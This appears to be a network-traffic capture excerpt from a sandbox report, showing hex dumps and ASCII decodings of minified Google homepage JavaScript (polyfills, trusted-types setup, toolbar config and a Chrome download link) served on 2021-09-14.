                                                                                                                                                                      Data Ascii: 104V(a);return d},V=function(a){for(var b=a.h.concat(a.g),d=[],c=[],f=0;f<a.g.length;++f){var l=a.g[f];X(l,b)?(d.push(l),G(l)):c.push(l)}for(f=0;f<a.h.length;++f)l=a.h[f],X(l,b)?d.push(l):(c.push(l),U(a,l));a.g=c;a.h=d},U=function(a,b){var d=b.g;aa&&(d.
                                                                                                                                                                      2021-09-14 14:03:24 UTC26INData Raw: 38 30 30 30 0d 0a 6f 72 3d 22 70 6f 69 6e 74 65 72 22 29 3b 66 6f 72 28 64 3d 30 3b 64 3c 61 2e 73 2e 6c 65 6e 67 74 68 3b 2b 2b 64 29 62 2e 68 2e 70 75 73 68 28 61 2e 73 5b 64 5d 2e 63 61 6c 6c 28 6e 75 6c 6c 2c 62 2e 67 29 29 7d 2c 59 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 2e 69 3d 62 3b 61 2e 6a 26 26 28 30 3c 61 2e 6a 2e 6c 65 6e 67 74 68 26 26 62 28 61 2e 6a 29 2c 61 2e 6a 3d 6e 75 6c 6c 29 7d 2c 58 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 66 6f 72 28 76 61 72 20 64 3d 30 3b 64 3c 62 2e 6c 65 6e 67 74 68 3b 2b 2b 64 29 69 66 28 62 5b 64 5d 2e 67 21 3d 61 2e 67 26 26 54 28 62 5b 64 5d 2e 67 2c 61 2e 67 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 54 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 66 6f 72 28 3b 61 21 3d 62
                                                                                                                                                                      Data Ascii: 8000or="pointer");for(d=0;d<a.s.length;++d)b.h.push(a.s[d].call(null,b.g))},Y=function(a,b){a.i=b;a.j&&(0<a.j.length&&b(a.j),a.j=null)},X=function(a,b){for(var d=0;d<b.length;++d)if(b[d].g!=a.g&&T(b[d].g,a.g))return!0;return!1},T=function(a,b){for(;a!=b
                                                                                                                                                                      2021-09-14 14:03:24 UTC27INData Raw: 21 31 7d 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 2e 65 72 64 3d 7b 73 70 3a 27 68 70 27 2c 6a 73 72 3a 30 2c 62 76 3a 38 31 2c 73 64 3a 74 72 75 65 7d 3b 7d 29 28 29 3b 3b 74 68 69 73 2e 67 62 61 72 5f 3d 7b 43 4f 4e 46 49 47 3a 5b 5b 5b 30 2c 22 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 2c 22 6f 67 2e 71 74 6d 2e 65 6e 5f 55 53 2e 61 75 53 72 46 57 2d 46 58 39 30 2e 4f 22 2c 22 63 6f 2e 75 6b 22 2c 22 65 6e 22 2c 22 35 33 38 22 2c 30 2c 5b 34 2c 32 2c 22 22 2c 22 22 2c 22 22 2c 22 33 39 35 33 37 32 39 35 34 22 2c 22 30 22 5d 2c 6e 75 6c 6c 2c 22 72 4b 74 41 59 66 75 69 48 73 72 6f 6b 67 58 6d 6b 49 69 67 44 51 22 2c 6e 75 6c 6c 2c 30 2c 22 6f 67 2e 71 74 6d 2e 77 74 58
                                                                                                                                                                      Data Ascii: !1};}).call(this);(function(){window.google.erd={sp:'hp',jsr:0,bv:81,sd:true};})();;this.gbar_={CONFIG:[[[0,"www.gstatic.com","og.qtm.en_US.auSrFW-FX90.O","co.uk","en","538",0,[4,2,"","","","395372954","0"],null,"rKtAYfuiHsrokgXmkIigDQ",null,0,"og.qtm.wtX
                                                                                                                                                                      2021-09-14 14:03:24 UTC29INData Raw: 25 32 36 75 74 6d 5f 6d 65 64 69 75 6d 25 33 44 6d 61 74 65 72 69 61 6c 2d 63 61 6c 6c 6f 75 74 25 32 36 75 74 6d 5f 63 61 6d 70 61 69 67 6e 25 33 44 73 65 61 72 63 68 25 32 36 75 74 6d 5f 63 6f 6e 74 65 6e 74 25 33 44 67 6f 6f 67 6c 65 5f 72 65 63 6f 6d 6d 65 6e 64 73 25 32 36 75 74 6d 5f 6b 65 79 77 6f 72 64 25 33 44 4f 4b 57 4d 5c 75 30 30 32 36 73 6f 75 72 63 65 3d 68 70 70 5c 75 30 30 32 36 69 64 3d 31 39 30 32 35 35 30 33 5c 75 30 30 32 36 63 74 3d 37 5c 75 30 30 32 36 75 73 67 3d 41 46 51 6a 43 4e 48 6b 6e 76 52 6b 6c 74 67 30 57 36 42 62 4d 37 32 49 70 5f 77 68 72 4f 31 7a 37 51 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 31 2c 6e 75 6c 6c 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 30
                                                                                                                                                                      Data Ascii: %26utm_medium%3Dmaterial-callout%26utm_campaign%3Dsearch%26utm_content%3Dgoogle_recommends%26utm_keyword%3DOKWM\u0026source=hpp\u0026id=19025503\u0026ct=7\u0026usg=AFQjCNHknvRkltg0W6BbM72Ip_whrO1z7Q",null,null,null,null,null,1,null,0,0,1,0,0,0,null,null,0
                                                                                                                                                                      2021-09-14 14:03:24 UTC30INData Raw: 67 6c 65 2e 63 6f 6d 2f 75 72 6c 3f 71 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 63 68 72 6f 6d 65 2f 64 6f 77 6e 6c 6f 61 64 2d 63 68 72 6f 6d 65 2d 66 6f 72 2d 73 65 61 72 63 68 2f 25 33 46 62 72 61 6e 64 25 33 44 4f 4b 57 4d 25 32 36 75 74 6d 5f 73 6f 75 72 63 65 25 33 44 67 6f 6f 67 6c 65 2e 63 6f 6d 25 32 36 75 74 6d 5f 6d 65 64 69 75 6d 25 33 44 6d 61 74 65 72 69 61 6c 2d 63 61 6c 6c 6f 75 74 25 32 36 75 74 6d 5f 63 61 6d 70 61 69 67 6e 25 33 44 73 65 61 72 63 68 25 32 36 75 74 6d 5f 63 6f 6e 74 65 6e 74 25 33 44 67 6f 6f 67 6c 65 5f 72 65 63 6f 6d 6d 65 6e 64 73 25 32 36 75 74 6d 5f 6b 65 79 77 6f 72 64 25 33 44 4f 4b 57 4d 5c 75 30 30 32 36 73 6f 75 72 63 65 3d 68 70 70 5c 75 30 30 32 36 69 64 3d 31 39 30 32 35 35 30
                                                                                                                                                                      Data Ascii: gle.com/url?q=https://www.google.com/chrome/download-chrome-for-search/%3Fbrand%3DOKWM%26utm_source%3Dgoogle.com%26utm_medium%3Dmaterial-callout%26utm_campaign%3Dsearch%26utm_content%3Dgoogle_recommends%26utm_keyword%3DOKWM\u0026source=hpp\u0026id=1902550
                                                                                                                                                                      2021-09-14 14:03:24 UTC31INData Raw: 29 62 2e 63 61 6c 6c 28 63 2c 61 5b 64 5d 2c 64 2c 61 29 7d 3b 5f 2e 66 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 66 6f 72 28 76 61 72 20 63 2c 64 2c 65 3d 31 3b 65 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 7b 64 3d 61 72 67 75 6d 65 6e 74 73 5b 65 5d 3b 66 6f 72 28 63 20 69 6e 20 64 29 61 5b 63 5d 3d 64 5b 63 5d 3b 66 6f 72 28 76 61 72 20 66 3d 30 3b 66 3c 65 61 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 63 3d 65 61 5b 66 5d 2c 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 64 2c 63 29 26 26 28 61 5b 63 5d 3d 64 5b 63 5d 29 7d 7d 3b 0a 6a 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 72 65 74 75 72 6e 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 61 3f
                                                                                                                                                                      Data Ascii: )b.call(c,a[d],d,a)};_.fa=function(a,b){for(var c,d,e=1;e<arguments.length;e++){d=arguments[e];for(c in d)a[c]=d[c];for(var f=0;f<ea.length;f++)c=ea[f],Object.prototype.hasOwnProperty.call(d,c)&&(a[c]=d[c])}};ja=function(a,b,c){return"object"===typeof a?
                                                                                                                                                                      2021-09-14 14:03:24 UTC32INData Raw: 7d 74 68 72 6f 77 20 45 72 72 6f 72 28 22 61 22 29 3b 7d 3b 72 61 3d 71 61 28 74 68 69 73 29 3b 73 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 62 29 61 3a 7b 76 61 72 20 63 3d 72 61 3b 61 3d 61 2e 73 70 6c 69 74 28 22 2e 22 29 3b 66 6f 72 28 76 61 72 20 64 3d 30 3b 64 3c 61 2e 6c 65 6e 67 74 68 2d 31 3b 64 2b 2b 29 7b 76 61 72 20 65 3d 61 5b 64 5d 3b 69 66 28 21 28 65 20 69 6e 20 63 29 29 62 72 65 61 6b 20 61 3b 63 3d 63 5b 65 5d 7d 61 3d 61 5b 61 2e 6c 65 6e 67 74 68 2d 31 5d 3b 64 3d 63 5b 61 5d 3b 62 3d 62 28 64 29 3b 62 21 3d 64 26 26 6e 75 6c 6c 21 3d 62 26 26 70 61 28 63 2c 61 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 3a 62 7d 29 7d 7d 3b 0a 73 61 28 22 53 79 6d 62 6f 6c 22
                                                                                                                                                                      Data Ascii: }throw Error("a");};ra=qa(this);sa=function(a,b){if(b)a:{var c=ra;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&pa(c,a,{configurable:!0,writable:!0,value:b})}};sa("Symbol"
                                                                                                                                                                      2021-09-14 14:03:24 UTC34INData Raw: 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 29 77 61 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3b 65 6c 73 65 7b 76 61 72 20 78 61 3b 61 3a 7b 76 61 72 20 79 61 3d 7b 61 3a 21 30 7d 2c 7a 61 3d 7b 7d 3b 74 72 79 7b 7a 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 79 61 3b 78 61 3d 7a 61 2e 61 3b 62 72 65 61 6b 20 61 7d 63 61 74 63 68 28 61 29 7b 7d 78 61 3d 21 31 7d 77 61 3d 78 61 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 62 3b 69 66 28 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 21 3d 3d 62 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 64 60 22 2b 61 29 3b 72 65 74 75 72 6e 20 61 7d 3a 6e 75 6c 6c 7d 41 61 3d 77 61 3b 0a 5f 2e 71 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b
                                                                                                                                                                      Data Ascii: Object.setPrototypeOf)wa=Object.setPrototypeOf;else{var xa;a:{var ya={a:!0},za={};try{za.__proto__=ya;xa=za.a;break a}catch(a){}xa=!1}wa=xa?function(a,b){a.__proto__=b;if(a.__proto__!==b)throw new TypeError("d`"+a);return a}:null}Aa=wa;_.q=function(a,b){
                                                                                                                                                                      2021-09-14 14:03:24 UTC35INData Raw: 5d 2c 6d 5b 31 5d 29 7d 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 69 66 28 21 63 28 6c 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 65 22 29 3b 64 28 6c 29 3b 69 66 28 21 42 61 28 6c 2c 66 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 66 60 22 2b 6c 29 3b 6c 5b 66 5d 5b 74 68 69 73 2e 6a 5d 3d 6d 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 72 65 74 75 72 6e 20 63 28 6c 29 26 26 42 61 28 6c 2c 66 29 3f 6c 5b 66 5d 5b 74 68 69 73 2e 6a 5d 3a 76 6f 69 64 20 30 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 72 65 74 75 72 6e 20 63 28 6c 29 26 26 42 61 28 6c 2c 66 29 26 26 42 61 28 6c
                                                                                                                                                                      Data Ascii: ],m[1])}};k.prototype.set=function(l,m){if(!c(l))throw Error("e");d(l);if(!Ba(l,f))throw Error("f`"+l);l[f][this.j]=m;return this};k.prototype.get=function(l){return c(l)&&Ba(l,f)?l[f][this.j]:void 0};k.prototype.has=function(l){return c(l)&&Ba(l,f)&&Ba(l
                                                                                                                                                                      2021-09-14 14:03:24 UTC36INData Raw: 78 2c 31 29 2c 6b 2e 6c 69 73 74 2e 6c 65 6e 67 74 68 7c 7c 64 65 6c 65 74 65 20 74 68 69 73 2e 6f 5b 6b 2e 69 64 5d 2c 6b 2e 58 61 2e 68 63 2e 6e 65 78 74 3d 6b 2e 58 61 2e 6e 65 78 74 2c 6b 2e 58 61 2e 6e 65 78 74 2e 68 63 3d 0a 6b 2e 58 61 2e 68 63 2c 6b 2e 58 61 2e 68 65 61 64 3d 6e 75 6c 6c 2c 74 68 69 73 2e 73 69 7a 65 2d 2d 2c 21 30 29 3a 21 31 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6c 65 61 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 6f 3d 7b 7d 3b 74 68 69 73 2e 6a 3d 74 68 69 73 2e 6a 2e 68 63 3d 66 28 29 3b 74 68 69 73 2e 73 69 7a 65 3d 30 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 72 65 74 75 72 6e 21 21 64 28 74 68 69 73 2c 6b 29 2e 58 61 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e
                                                                                                                                                                      Data Ascii: x,1),k.list.length||delete this.o[k.id],k.Xa.hc.next=k.Xa.next,k.Xa.next.hc=k.Xa.hc,k.Xa.head=null,this.size--,!0):!1};c.prototype.clear=function(){this.o={};this.j=this.j.hc=f();this.size=0};c.prototype.has=function(k){return!!d(this,k).Xa};c.prototype.
                                                                                                                                                                      2021-09-14 14:03:24 UTC37INData Raw: 66 20 52 65 67 45 78 70 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 68 60 22 2b 63 29 3b 72 65 74 75 72 6e 20 61 2b 22 22 7d 3b 73 61 28 22 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6e 64 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 61 3a 7b 76 61 72 20 64 3d 74 68 69 73 3b 64 20 69 6e 73 74 61 6e 63 65 6f 66 20 53 74 72 69 6e 67 26 26 28 64 3d 53 74 72 69 6e 67 28 64 29 29 3b 66 6f 72 28 76 61 72 20 65 3d 64 2e 6c 65 6e 67 74 68 2c 66 3d 30 3b 66 3c 65 3b 66 2b 2b 29 7b 76 61 72 20 67 3d 64 5b 66 5d 3b 69 66 28 62 2e 63 61 6c 6c 28 63 2c 67 2c 66 2c 64 29 29 7b 62 3d 67 3b 62 72 65 61 6b 20 61 7d 7d 62 3d 76 6f 69 64 20 30 7d 72 65 74 75 72 6e 20 62
                                                                                                                                                                      Data Ascii: f RegExp)throw new TypeError("h`"+c);return a+""};sa("Array.prototype.find",function(a){return a?a:function(b,c){a:{var d=this;d instanceof String&&(d=String(d));for(var e=d.length,f=0;f<e;f++){var g=d[f];if(b.call(c,g,f,d)){b=g;break a}}b=void 0}return b
                                                                                                                                                                      2021-09-14 14:03:24 UTC39INData Raw: 75 72 6e 20 63 7d 29 7d 7d 29 3b 73 61 28 22 41 72 72 61 79 2e 66 72 6f 6d 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 2c 64 29 7b 63 3d 6e 75 6c 6c 21 3d 63 3f 63 3a 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 72 65 74 75 72 6e 20 6b 7d 3b 76 61 72 20 65 3d 5b 5d 2c 66 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 26 26 62 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 66 29 7b 62 3d 66 2e 63 61 6c 6c 28 62 29 3b 66 6f 72 28 76 61 72 20 67 3d 30 3b 21 28 66 3d 62 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 65 2e 70 75 73 68 28 63 2e 63 61
                                                                                                                                                                      Data Ascii: urn c})}});sa("Array.from",function(a){return a?a:function(b,c,d){c=null!=c?c:function(k){return k};var e=[],f="undefined"!=typeof Symbol&&Symbol.iterator&&b[Symbol.iterator];if("function"==typeof f){b=f.call(b);for(var g=0;!(f=b.next()).done;)e.push(c.ca
                                                                                                                                                                      2021-09-14 14:03:24 UTC40INData Raw: 74 68 69 73 2e 6a 2e 76 61 6c 75 65 73 28 29 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 6b 65 79 73 3d 62 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 73 3b 0a 62 2e 70 72 6f 74 6f 74 79 70 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 62 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 73 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 66 6f 72 45 61 63 68 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 74 68 69 73 2e 6a 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65 74 75 72 6e 20 63 2e 63 61 6c 6c 28 64 2c 66 2c 66 2c 65 29 7d 29 7d 3b 72 65 74 75 72 6e 20 62 7d 29 3b 73 61 28 22 4f 62 6a 65 63 74 2e 65 6e 74 72 69 65 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66
                                                                                                                                                                      Data Ascii: this.j.values()};b.prototype.keys=b.prototype.values;b.prototype[Symbol.iterator]=b.prototype.values;b.prototype.forEach=function(c,d){var e=this;this.j.forEach(function(f){return c.call(d,f,f,e)})};return b});sa("Object.entries",function(a){return a?a:f
                                                                                                                                                                      2021-09-14 14:03:24 UTC41INData Raw: 28 22 46 6c 6f 61 74 33 32 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6c 6c 22 2c 46 61 29 3b 73 61 28 22 46 6c 6f 61 74 36 34 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6c 6c 22 2c 46 61 29 3b 5f 2e 47 61 3d 5f 2e 47 61 7c 7c 7b 7d 3b 5f 2e 74 3d 74 68 69 73 7c 7c 73 65 6c 66 3b 5f 2e 48 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 5f 2e 49 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 74 79 70 65 6f 66 20 61 3b 72 65 74 75 72 6e 22 6f 62 6a 65 63 74 22 3d 3d 62 26 26 6e 75 6c 6c 21 3d 61 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 62 7d 3b 5f 2e 4d 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28
                                                                                                                                                                      Data Ascii: ("Float32Array.prototype.fill",Fa);sa("Float64Array.prototype.fill",Fa);_.Ga=_.Ga||{};_.t=this||self;_.Ha=function(){};_.Ia=function(a){var b=typeof a;return"object"==b&&null!=a||"function"==b};_.Ma=function(a){return Object.prototype.hasOwnProperty.call(
                                                                                                                                                                      2021-09-14 14:03:24 UTC43INData Raw: 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 7d 3b 0a 5f 2e 51 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 6e 75 6c 6c 2c 63 3d 5f 2e 74 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 69 66 28 21 63 7c 7c 21 63 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 29 72 65 74 75 72 6e 20 62 3b 74 72 79 7b 62 3d 63 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 28 61 2c 7b 63 72 65 61 74 65 48 54 4d 4c 3a 50 61 2c 63 72 65 61 74 65 53 63 72 69 70 74 3a 50 61 2c 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 3a 50 61 7d 29 7d 63 61 74 63 68 28 64 29 7b 5f 2e 74 2e 63 6f 6e 73 6f 6c 65 26 26 5f 2e 74 2e 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 64 2e 6d 65 73 73 61 67 65 29 7d 72 65 74 75 72 6e 20 62 7d 3b 0a 5f 2e 7a 28 5f 2e 61 61 2c 45 72 72 6f 72 29 3b
                                                                                                                                                                      Data Ascii: function(a){return a};_.Qa=function(a){var b=null,c=_.t.trustedTypes;if(!c||!c.createPolicy)return b;try{b=c.createPolicy(a,{createHTML:Pa,createScript:Pa,createScriptURL:Pa})}catch(d){_.t.console&&_.t.console.error(d.message)}return b};_.z(_.aa,Error);
                                                                                                                                                                      2021-09-14 14:03:24 UTC44INData Raw: 75 63 65 2e 63 61 6c 6c 28 61 2c 62 2c 63 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 76 61 72 20 64 3d 63 3b 28 30 2c 5f 2e 54 61 29 28 61 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 66 29 7b 64 3d 62 2e 63 61 6c 6c 28 76 6f 69 64 20 30 2c 64 2c 65 2c 66 2c 61 29 7d 29 3b 72 65 74 75 72 6e 20 64 7d 3b 5f 2e 58 61 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6f 6d 65 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6f 6d 65 2e 63 61 6c 6c 28 61 2c 62 2c 76 6f 69 64 20 30 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 66 6f 72 28 76 61 72 20 63 3d 61 2e 6c 65 6e 67 74 68 2c 64 3d 22 73 74 72 69 6e 67 22 3d 3d 3d 74 79 70 65 6f 66 20 61 3f 61 2e 73 70 6c 69 74 28 22 22 29
                                                                                                                                                                      Data Ascii: uce.call(a,b,c)}:function(a,b,c){var d=c;(0,_.Ta)(a,function(e,f){d=b.call(void 0,d,e,f,a)});return d};_.Xa=Array.prototype.some?function(a,b){return Array.prototype.some.call(a,b,void 0)}:function(a,b){for(var c=a.length,d="string"===typeof a?a.split("")
                                                                                                                                                                      2021-09-14 14:03:24 UTC45INData Raw: 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 67 62 26 26 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 5f 2e 67 62 3f 61 2e 6a 3a 22 74 79 70 65 5f 65 72 72 6f 72 3a 53 61 66 65 55 72 6c 22 7d 3b 0a 69 62 3d 52 65 67 45 78 70 28 27 5e 28 3f 3a 61 75 64 69 6f 2f 28 3f 3a 33 67 70 70 32 7c 33 67 70 70 7c 61 61 63 7c 4c 31 36 7c 6d 69 64 69 7c 6d 70 33 7c 6d 70 34 7c 6d 70 65 67 7c 6f 67 61 7c 6f 67 67 7c 6f 70 75 73 7c 78 2d 6d 34 61 7c 78 2d 6d 61 74 72 6f 73 6b 61 7c 78 2d 77 61 76 7c 77 61 76 7c 77 65 62 6d 29 7c 66 6f 6e 74 2f 5c 5c 77 2b 7c 69 6d 61 67 65 2f 28 3f 3a 62 6d 70 7c 67 69 66 7c 6a 70 65 67 7c 6a 70 67 7c 70 6e 67 7c 74 69 66 66 7c 77 65 62 70 7c 78 2d 69 63 6f 6e 29 7c 76 69 64 65 6f 2f 28 3f 3a 6d 70 65 67 7c 6d 70 34 7c 6f 67 67 7c 77 65 62 6d
                                                                                                                                                                      Data Ascii: nstanceof _.gb&&a.constructor===_.gb?a.j:"type_error:SafeUrl"};ib=RegExp('^(?:audio/(?:3gpp2|3gpp|aac|L16|midi|mp3|mp4|mpeg|oga|ogg|opus|x-m4a|x-matroska|x-wav|wav|webm)|font/\\w+|image/(?:bmp|gif|jpeg|jpg|png|tiff|webp|x-icon)|video/(?:mpeg|mp4|ogg|webm
                                                                                                                                                                      2021-09-14 14:03:24 UTC46INData Raw: 74 7c 72 67 62 7c 72 67 62 61 7c 28 72 6f 74 61 74 65 7c 73 63 61 6c 65 7c 74 72 61 6e 73 6c 61 74 65 29 28 58 7c 59 7c 5a 7c 33 64 29 3f 7c 76 61 72 29 5c 5c 28 5b 2d 2b 2a 2f 30 2d 39 61 2d 7a 2e 25 5c 5c 5b 5c 5c 5d 2c 20 5d 2b 5c 5c 29 22 2c 22 67 22 29 3b 0a 61 3a 7b 76 61 72 20 77 62 3d 5f 2e 74 2e 6e 61 76 69 67 61 74 6f 72 3b 69 66 28 77 62 29 7b 76 61 72 20 78 62 3d 77 62 2e 75 73 65 72 41 67 65 6e 74 3b 69 66 28 78 62 29 7b 5f 2e 76 62 3d 78 62 3b 62 72 65 61 6b 20 61 7d 7d 5f 2e 76 62 3d 22 22 7d 5f 2e 41 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 2d 31 21 3d 5f 2e 76 62 2e 69 6e 64 65 78 4f 66 28 61 29 7d 3b 0a 76 61 72 20 41 62 3b 5f 2e 79 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 41 28 22 54 72 69 64 65
                                                                                                                                                                      Data Ascii: t|rgb|rgba|(rotate|scale|translate)(X|Y|Z|3d)?|var)\\([-+*/0-9a-z.%\\[\\], ]+\\)","g");a:{var wb=_.t.navigator;if(wb){var xb=wb.userAgent;if(xb){_.vb=xb;break a}}_.vb=""}_.A=function(a){return-1!=_.vb.indexOf(a)};var Ab;_.yb=function(){return _.A("Tride
                                                                                                                                                                      2021-09-14 14:03:24 UTC48INData Raw: 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 29 3b 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 62 29 3b 62 3d 61 2e 66 69 72 73 74 43 68 69 6c 64 2e 66 69 72 73 74 43 68 69 6c 64 3b 61 2e 69 6e 6e 65 72 48 54 4d 4c 3d 5f 2e 46 62 28 5f 2e 48 62 29 3b 72 65 74 75 72 6e 21 62 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 7d 29 3b 5f 2e 4c 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 5f 2e 4b 62 28 27 73 74 79 6c 65 5b 6e 6f 6e 63 65 5d 2c 6c 69 6e 6b 5b 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 5d 5b 6e 6f 6e 63 65 5d 27 2c 61 29 7d 3b 4d 62 3d 2f 5e 5b 5c 77 2b 2f 5f 2d 5d 2b 5b 3d 5d 7b 30 2c 32 7d 24 2f 3b 0a 5f 2e 4b 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 28 62 7c 7c 5f 2e 74 29 2e 64 6f 63 75
                                                                                                                                                                      Data Ascii: ent.createElement("div"));a.appendChild(b);b=a.firstChild.firstChild;a.innerHTML=_.Fb(_.Hb);return!b.parentElement});_.Lb=function(a){return _.Kb('style[nonce],link[rel="stylesheet"][nonce]',a)};Mb=/^[\w+/_-]+[=]{0,2}$/;_.Kb=function(a,b){b=(b||_.t).docu
